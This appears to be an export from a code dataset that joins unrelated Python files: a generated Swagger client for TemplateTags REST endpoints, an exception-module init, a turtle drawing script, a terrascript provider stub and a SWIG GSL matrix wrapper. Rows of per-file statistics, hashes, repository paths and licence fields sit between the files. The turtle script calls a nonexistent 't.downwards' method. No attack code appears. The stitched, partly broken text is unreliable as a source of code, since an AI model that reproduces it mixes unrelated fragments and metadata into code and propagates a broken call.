If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.template_tags_id_patch_with_http_info(id, **kwargs)
else:
(data) = self.template_tags_id_patch_with_http_info(id, **kwargs)
return data
def template_tags_id_patch_with_http_info(self, id, **kwargs):
"""
Patch attributes for a model instance and persist it into the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.template_tags_id_patch_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: TemplateTag id (required)
:param TemplateTag data: An object of model property name/value pairs
:return: TemplateTag
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method template_tags_id_patch" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `template_tags_id_patch`")
collection_formats = {}
resource_path = '/TemplateTags/{id}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TemplateTag',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def template_tags_id_put(self, id, **kwargs):
"""
Replace attributes for a model instance and persist it into the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.template_tags_id_put(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:param TemplateTag data: Model instance data
:return: TemplateTag
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.template_tags_id_put_with_http_info(id, **kwargs)
else:
(data) = self.template_tags_id_put_with_http_info(id, **kwargs)
return data
def template_tags_id_put_with_http_info(self, id, **kwargs):
"""
Replace attributes for a model instance and persist it into the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.template_tags_id_put_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:param TemplateTag data: Model instance data
:return: TemplateTag
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method template_tags_id_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `template_tags_id_put`")
collection_formats = {}
resource_path = '/TemplateTags/{id}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TemplateTag',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def template_tags_id_replace_post(self, id, **kwargs):
"""
Replace attributes for a model instance and persist it into the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.template_tags_id_replace_post(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:param TemplateTag data: Model instance data
:return: TemplateTag
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.template_tags_id_replace_post_with_http_info(id, **kwargs)
else:
(data) = self.template_tags_id_replace_post_with_http_info(id, **kwargs)
return data
def template_tags_id_replace_post_with_http_info(self, id, **kwargs):
"""
Replace attributes for a model instance and persist it into the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.template_tags_id_replace_post_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:param TemplateTag data: Model instance data
:return: TemplateTag
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method template_tags_id_replace_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `template_tags_id_replace_post`")
collection_formats = {}
resource_path = '/TemplateTags/{id}/replace'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TemplateTag',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def template_tags_id_tag_get(self, id, **kwargs):
"""
Fetches belongsTo relation tag.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.template_tags_id_tag_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: TemplateTag id (required)
:param bool refresh:
:return: Tag
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.template_tags_id_tag_get_with_http_info(id, **kwargs)
else:
(data) = self.template_tags_id_tag_get_with_http_info(id, **kwargs)
return data
def template_tags_id_tag_get_with_http_info(self, id, **kwargs):
"""
Fetches belongsTo relation tag.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.template_tags_id_tag_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: TemplateTag id (required)
:param bool refresh:
:return: Tag
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'refresh']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method template_tags_id_tag_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `template_tags_id_tag_get`")
collection_formats = {}
resource_path = '/TemplateTags/{id}/tag'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'refresh' in params:
query_params['refresh'] = params['refresh']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Tag',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def template_tags_id_template_get(self, id, **kwargs):
"""
Fetches belongsTo relation template.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.template_tags_id_template_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: TemplateTag id (required)
:param bool refresh:
:return: Template
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.template_tags_id_template_get_with_http_info(id, **kwargs)
else:
(data) = self.template_tags_id_template_get_with_http_info(id, **kwargs)
return data
def template_tags_id_template_get_with_http_info(self, id, **kwargs):
"""
Fetches belongsTo relation template.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.template_tags_id_template_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: TemplateTag id (required)
:param bool refresh:
:return: Template
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'refresh']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method template_tags_id_template_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `template_tags_id_template_get`")
collection_formats = {}
resource_path = '/TemplateTags/{id}/template'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'refresh' in params:
query_params['refresh'] = params['refresh']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Template',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def template_tags_post(self, **kwargs):
"""
Create a new instance of the model and persist it into the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.template_tags_post(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param TemplateTag data: Model instance data
:return: TemplateTag
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.template_tags_post_with_http_info(**kwargs)
else:
(data) = self.template_tags_post_with_http_info(**kwargs)
return data
def template_tags_post_with_http_info(self, **kwargs):
"""
Create a new instance of the model and persist it into the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.template_tags_post_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param TemplateTag data: Model instance data
:return: TemplateTag
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method template_tags_post" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/TemplateTags'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TemplateTag',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
| 40.457415
| 165
| 0.561462
| 6,924
| 67,928
| 5.287262
| 0.037262
| 0.065558
| 0.027534
| 0.029501
| 0.965664
| 0.96184
| 0.959464
| 0.949493
| 0.946161
| 0.945888
| 0
| 0.001071
| 0.353919
| 67,928
| 1,678
| 166
| 40.481526
| 0.833094
| 0.321959
| 0
| 0.825864
| 0
| 0
| 0.173238
| 0.060126
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039693
| false
| 0
| 0.008963
| 0
| 0.107554
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
649a584a39dd97cce08207aa09f799451aaae5c6
| 72
|
py
|
Python
|
src/ifood/exception/__init__.py
|
micael95/sdk-ifood-python
|
27462d8127b62a29b5c89624e79accbea9563a80
|
[
"MIT"
] | 2
|
2021-05-06T18:50:43.000Z
|
2021-06-05T21:54:04.000Z
|
src/ifood/exception/__init__.py
|
micael95/sdk-ifood-python
|
27462d8127b62a29b5c89624e79accbea9563a80
|
[
"MIT"
] | null | null | null |
src/ifood/exception/__init__.py
|
micael95/sdk-ifood-python
|
27462d8127b62a29b5c89624e79accbea9563a80
|
[
"MIT"
] | 1
|
2021-05-06T18:50:54.000Z
|
2021-05-06T18:50:54.000Z
|
from .ifood_exception import *
from .validation_ifood_exception import *
| 36
| 41
| 0.847222
| 9
| 72
| 6.444444
| 0.555556
| 0.482759
| 0.689655
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.097222
| 72
| 2
| 41
| 36
| 0.892308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
64ab436012e110ea7d115add07512853261d146c
| 2,252
|
py
|
Python
|
files/turtle/turtle_test.py
|
HenraL/NSI_1ereG6_Programme_Python
|
9f46b848fa2331daca57e5e2e11cba41da45a67f
|
[
"Unlicense"
] | 1
|
2021-06-15T13:44:47.000Z
|
2021-06-15T13:44:47.000Z
|
files/turtle/turtle_test.py
|
HenraL/NSI_1ereG6_Programme_Python
|
9f46b848fa2331daca57e5e2e11cba41da45a67f
|
[
"Unlicense"
] | null | null | null |
files/turtle/turtle_test.py
|
HenraL/NSI_1ereG6_Programme_Python
|
9f46b848fa2331daca57e5e2e11cba41da45a67f
|
[
"Unlicense"
] | null | null | null |
import turtle
from time import sleep
t = turtle.Turtle()
for c in ['red', 'green', 'yellow', 'blue', 'orange', 'black', 'purple', 'pink', 'orange', 'blue', 'yellow', 'lightgreen', 'red', 'green', 'yellow', 'blue', 'orange', 'black', 'purple', 'pink', 'orange', 'blue', 'yellow', 'lightgreen', 'red', 'green', 'yellow', 'blue', 'orange', 'black', 'purple', 'pink', 'orange', 'blue', 'yellow', 'lightgreen', 'red', 'green', 'yellow', 'blue', 'orange', 'black', 'purple', 'pink', 'orange', 'blue', 'yellow', 'lightgreen', 'red', 'green', 'yellow', 'blue', 'orange', 'black', 'purple', 'pink', 'orange', 'blue', 'yellow', 'lightgreen', 'red', 'green', 'yellow', 'blue', 'orange', 'black', 'purple', 'pink', 'orange', 'blue', 'yellow', 'lightgreen', 'red', 'green', 'yellow', 'blue', 'orange', 'black', 'purple', 'pink', 'orange', 'blue', 'yellow', 'lightgreen', 'red', 'green', 'yellow', 'blue', 'orange', 'black', 'purple', 'pink', 'orange', 'blue', 'yellow', 'lightgreen','red', 'green', 'yellow', 'blue', 'orange', 'black', 'purple', 'pink', 'orange', 'blue', 'yellow', 'lightgreen', 'red', 'green', 'yellow', 'blue', 'orange', 'black', 'purple', 'pink', 'orange', 'blue', 'yellow', 'lightgreen', 'red', 'green', 'yellow', 'blue', 'orange', 'black', 'purple', 'pink', 'orange', 'blue', 'yellow', 'lightgreen', 'red', 'green', 'yellow', 'blue', 'orange', 'black', 'purple', 'pink', 'orange', 'blue', 'yellow', 'lightgreen', 'red', 'green', 'yellow', 'blue', 'orange', 'black', 'purple', 'pink', 'orange', 'blue', 'yellow', 'lightgreen', 'red', 'green', 'yellow', 'blue', 'orange', 'black', 'purple', 'pink', 'orange', 'blue', 'yellow', 'lightgreen', 'red', 'green', 'yellow', 'blue', 'orange', 'black', 'purple', 'pink', 'orange', 'blue', 'yellow', 'lightgreen', 'red', 'green', 'yellow', 'blue', 'orange', 'black', 'purple', 'pink', 'orange', 'blue', 'yellow', 'lightgreen']:
t.color(c)
t.forward(75)
t.left(50)
t.penup()
t.forward(85)
t.pendown()
for d in ['red', 'green', 'yellow', 'blue', 'orange', 'black', 'purple', 'pink']:
t.color(d)
t.forward(85)
t.right(60)
t.penup()
t.downwards(85)
t.pendown()
for d in ['red', 'green', 'yellow', 'blue', 'orange', 'black', 'purple', 'pink']:
t.color(d)
t.forward(85)
t.right(90)
sleep (5)
| 93.833333
| 1,817
| 0.581705
| 269
| 2,252
| 4.869888
| 0.118959
| 0.109924
| 0.192366
| 0.247328
| 0.914504
| 0.914504
| 0.914504
| 0.914504
| 0.914504
| 0.912977
| 0
| 0.008538
| 0.115897
| 2,252
| 24
| 1,818
| 93.833333
| 0.649422
| 0
| 0
| 0.5
| 0
| 0
| 0.496227
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.090909
| 0
| 0.090909
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
b37eff738a5e15e2da690cb01607ff9536132758
| 388
|
py
|
Python
|
terrascript/provider/opsgenie.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 507
|
2017-07-26T02:58:38.000Z
|
2022-01-21T12:35:13.000Z
|
terrascript/provider/opsgenie.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 135
|
2017-07-20T12:01:59.000Z
|
2021-10-04T22:25:40.000Z
|
terrascript/provider/opsgenie.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 81
|
2018-02-20T17:55:28.000Z
|
2022-01-31T07:08:40.000Z
|
# terrascript/provider/opsgenie.py
# Automatically generated by tools/makecode.py (24-Aug-2021 11:33:38 UTC)
#
# For imports without namespace, e.g.
#
# >>> import terrascript.provider.opsgenie
#
# instead of
#
# >>> import terrascript.provider.opsgenie.opsgenie
#
# This is only available for 'official' and 'partner' providers.
from terrascript.provider.opsgenie.opsgenie import *
| 25.866667
| 73
| 0.75
| 49
| 388
| 5.938776
| 0.693878
| 0.261168
| 0.371134
| 0.226804
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.035608
| 0.131443
| 388
| 14
| 74
| 27.714286
| 0.827893
| 0.796392
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b3826ca2af3ffc6c2528e11442089749f9026e1e
| 35,080
|
py
|
Python
|
btk20_src/matrix/matrix.py
|
mmahrous90/distant_speech_recognition
|
083e663d7c1eb6e5fe89c40ba2b43a30bf9c65b5
|
[
"MIT"
] | null | null | null |
btk20_src/matrix/matrix.py
|
mmahrous90/distant_speech_recognition
|
083e663d7c1eb6e5fe89c40ba2b43a30bf9c65b5
|
[
"MIT"
] | null | null | null |
btk20_src/matrix/matrix.py
|
mmahrous90/distant_speech_recognition
|
083e663d7c1eb6e5fe89c40ba2b43a30bf9c65b5
|
[
"MIT"
] | null | null | null |
# This file was automatically generated by SWIG (http://www.swig.org).
# Version 3.0.12
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info as _swig_python_version_info
if _swig_python_version_info >= (2, 7, 0):
def swig_import_helper():
import importlib
pkg = __name__.rpartition('.')[0]
mname = '.'.join((pkg, '_matrix')).lstrip('.')
try:
return importlib.import_module(mname)
except ImportError:
return importlib.import_module('_matrix')
_matrix = swig_import_helper()
del swig_import_helper
elif _swig_python_version_info >= (2, 6, 0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('_matrix', [dirname(__file__)])
except ImportError:
import _matrix
return _matrix
try:
_mod = imp.load_module('_matrix', fp, pathname, description)
finally:
if fp is not None:
fp.close()
return _mod
_matrix = swig_import_helper()
del swig_import_helper
else:
import _matrix
del _swig_python_version_info
try:
_swig_property = property
except NameError:
pass # Python < 2.2 doesn't have 'property'.
try:
import builtins as __builtin__
except ImportError:
import __builtin__
def _swig_setattr_nondynamic(self, class_type, name, value, static=1):
if (name == "thisown"):
return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name, None)
if method:
return method(self, value)
if (not static):
if _newclass:
object.__setattr__(self, name, value)
else:
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self, class_type, name, value):
return _swig_setattr_nondynamic(self, class_type, name, value, 0)
def _swig_getattr(self, class_type, name):
if (name == "thisown"):
return self.this.own()
method = class_type.__swig_getmethods__.get(name, None)
if method:
return method(self)
raise AttributeError("'%s' object has no attribute '%s'" % (class_type.__name__, name))
def _swig_repr(self):
try:
strthis = "proxy of " + self.this.__repr__()
except __builtin__.Exception:
strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except __builtin__.Exception:
class _object:
pass
_newclass = 0
class gsl_matrix(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, gsl_matrix, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, gsl_matrix, name)
__repr__ = _swig_repr
__swig_setmethods__["size1"] = _matrix.gsl_matrix_size1_set
__swig_getmethods__["size1"] = _matrix.gsl_matrix_size1_get
if _newclass:
size1 = _swig_property(_matrix.gsl_matrix_size1_get, _matrix.gsl_matrix_size1_set)
__swig_setmethods__["size2"] = _matrix.gsl_matrix_size2_set
__swig_getmethods__["size2"] = _matrix.gsl_matrix_size2_get
if _newclass:
size2 = _swig_property(_matrix.gsl_matrix_size2_get, _matrix.gsl_matrix_size2_set)
__swig_setmethods__["tda"] = _matrix.gsl_matrix_tda_set
__swig_getmethods__["tda"] = _matrix.gsl_matrix_tda_get
if _newclass:
tda = _swig_property(_matrix.gsl_matrix_tda_get, _matrix.gsl_matrix_tda_set)
__swig_setmethods__["data"] = _matrix.gsl_matrix_data_set
__swig_getmethods__["data"] = _matrix.gsl_matrix_data_get
if _newclass:
data = _swig_property(_matrix.gsl_matrix_data_get, _matrix.gsl_matrix_data_set)
__swig_setmethods__["block"] = _matrix.gsl_matrix_block_set
__swig_getmethods__["block"] = _matrix.gsl_matrix_block_get
if _newclass:
block = _swig_property(_matrix.gsl_matrix_block_get, _matrix.gsl_matrix_block_set)
__swig_setmethods__["owner"] = _matrix.gsl_matrix_owner_set
__swig_getmethods__["owner"] = _matrix.gsl_matrix_owner_get
if _newclass:
owner = _swig_property(_matrix.gsl_matrix_owner_get, _matrix.gsl_matrix_owner_set)
def __init__(self, m, n):
this = _matrix.new_gsl_matrix(m, n)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _matrix.delete_gsl_matrix
__del__ = lambda self: None
def nrows(self):
return _matrix.gsl_matrix_nrows(self)
def ncols(self):
return _matrix.gsl_matrix_ncols(self)
def __getitem__(self, m, n):
return _matrix.gsl_matrix___getitem__(self, m, n)
def __setitem__(self, item, n, m):
return _matrix.gsl_matrix___setitem__(self, item, n, m)
gsl_matrix_swigregister = _matrix.gsl_matrix_swigregister
gsl_matrix_swigregister(gsl_matrix)
class _gsl_matrix_view(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, _gsl_matrix_view, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, _gsl_matrix_view, name)
__repr__ = _swig_repr
__swig_setmethods__["matrix"] = _matrix._gsl_matrix_view_matrix_set
__swig_getmethods__["matrix"] = _matrix._gsl_matrix_view_matrix_get
if _newclass:
matrix = _swig_property(_matrix._gsl_matrix_view_matrix_get, _matrix._gsl_matrix_view_matrix_set)
def __init__(self):
this = _matrix.new__gsl_matrix_view()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _matrix.delete__gsl_matrix_view
__del__ = lambda self: None
_gsl_matrix_view_swigregister = _matrix._gsl_matrix_view_swigregister
_gsl_matrix_view_swigregister(_gsl_matrix_view)
class _gsl_matrix_const_view(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, _gsl_matrix_const_view, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, _gsl_matrix_const_view, name)
__repr__ = _swig_repr
__swig_setmethods__["matrix"] = _matrix._gsl_matrix_const_view_matrix_set
__swig_getmethods__["matrix"] = _matrix._gsl_matrix_const_view_matrix_get
if _newclass:
matrix = _swig_property(_matrix._gsl_matrix_const_view_matrix_get, _matrix._gsl_matrix_const_view_matrix_set)
def __init__(self):
this = _matrix.new__gsl_matrix_const_view()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _matrix.delete__gsl_matrix_const_view
__del__ = lambda self: None
_gsl_matrix_const_view_swigregister = _matrix._gsl_matrix_const_view_swigregister
_gsl_matrix_const_view_swigregister(_gsl_matrix_const_view)
def gsl_matrix_alloc(n1, n2):
return _matrix.gsl_matrix_alloc(n1, n2)
gsl_matrix_alloc = _matrix.gsl_matrix_alloc
def gsl_matrix_calloc(n1, n2):
return _matrix.gsl_matrix_calloc(n1, n2)
gsl_matrix_calloc = _matrix.gsl_matrix_calloc
def gsl_matrix_alloc_from_block(b, offset, n1, n2, d2):
return _matrix.gsl_matrix_alloc_from_block(b, offset, n1, n2, d2)
gsl_matrix_alloc_from_block = _matrix.gsl_matrix_alloc_from_block
def gsl_matrix_alloc_from_matrix(m, k1, k2, n1, n2):
return _matrix.gsl_matrix_alloc_from_matrix(m, k1, k2, n1, n2)
gsl_matrix_alloc_from_matrix = _matrix.gsl_matrix_alloc_from_matrix
def gsl_vector_alloc_row_from_matrix(m, i):
return _matrix.gsl_vector_alloc_row_from_matrix(m, i)
